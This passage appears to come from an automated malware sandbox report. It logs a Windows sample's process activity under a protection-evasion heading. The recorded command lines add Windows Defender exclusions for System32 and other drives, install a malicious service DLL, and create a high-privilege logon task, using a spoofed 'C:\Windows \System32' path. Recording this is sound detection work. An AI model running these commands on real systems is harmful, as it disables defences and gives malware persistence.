Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2BAE2C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_00007FF70F2BAE2C
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FF70F2ADEB0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_00007FF70F2ADEB0
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFBA8B4 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,32_2_00007FFBBAFBA8B4
Source: C:\Windows\System32\console_zero.exeCode function: 32_2_00007FFBBAFB9E30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,32_2_00007FFBBAFB9E30

HIPS / PFW / Operating System Protection Evasion

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\svchost.exeFile created: x549596.dat.26.drJump to dropped file
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Users\user\Desktop\58VSNPxrI4.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"Jump to behavior
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x939048Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 14 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 16 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x939048 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x939048\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x939048.dat" /f && sc start x939048
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x939048 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x939048\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x939048.dat" /f && sc start x939048Jump to behavior
Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesA,26_2_682952B9
Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoA,26_2_68295290
Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesA,26_2_682A1430
Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoA,26_2_682A1460
Source: C:\Windows\System32\svchost.exeCode function: strtoul,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,strncmp,26_2_682864E0
Source: C:\Windows\System32\svchost.exeCode function: strchr,pthread_mutex_lock,strcmp,strncpy,EnumSystemLocalesA,pthread_mutex_unlock,strcpy,pthread_mutex_unlock,abort,26_2_68287D70
Source: C:\Windows\System32\svchost.exeCode function: getenv,GetLocaleInfoA,26_2_68286680
Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,26_2_00007FFBAB064C8C
Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoEx,GetLocaleInfoW,26_2_00007FFBAB056B5C
Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesEx,26_2_00007FFBAB056A8C
Source: C:\Windows\System32\svchost.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,26_2_00007FFBAB056FB8
Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,26_2_00007FFBAB064E84
Source: C:\Windows\System32\svchost.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,26_2_00007FFBAB064424
Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoEx,FormatMessageA,26_2_00007FFBAB03A128
Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesW,26_2_00007FFBAB064858
Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesW,26_2_00007FFBAB064788
Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesW,26_2_00007FFBAB05667C
Source: C:\Windows\System32\console_zero.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,32_2_00007FF70F2C1B08
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoEx,GetLocaleInfoW,32_2_00007FF70F2C17A0
Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesEx,32_2_00007FF70F2C16D0
Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesW,32_2_00007FF70F2C142C
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoEx,FormatMessageA,32_2_00007FF70F2AC2E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
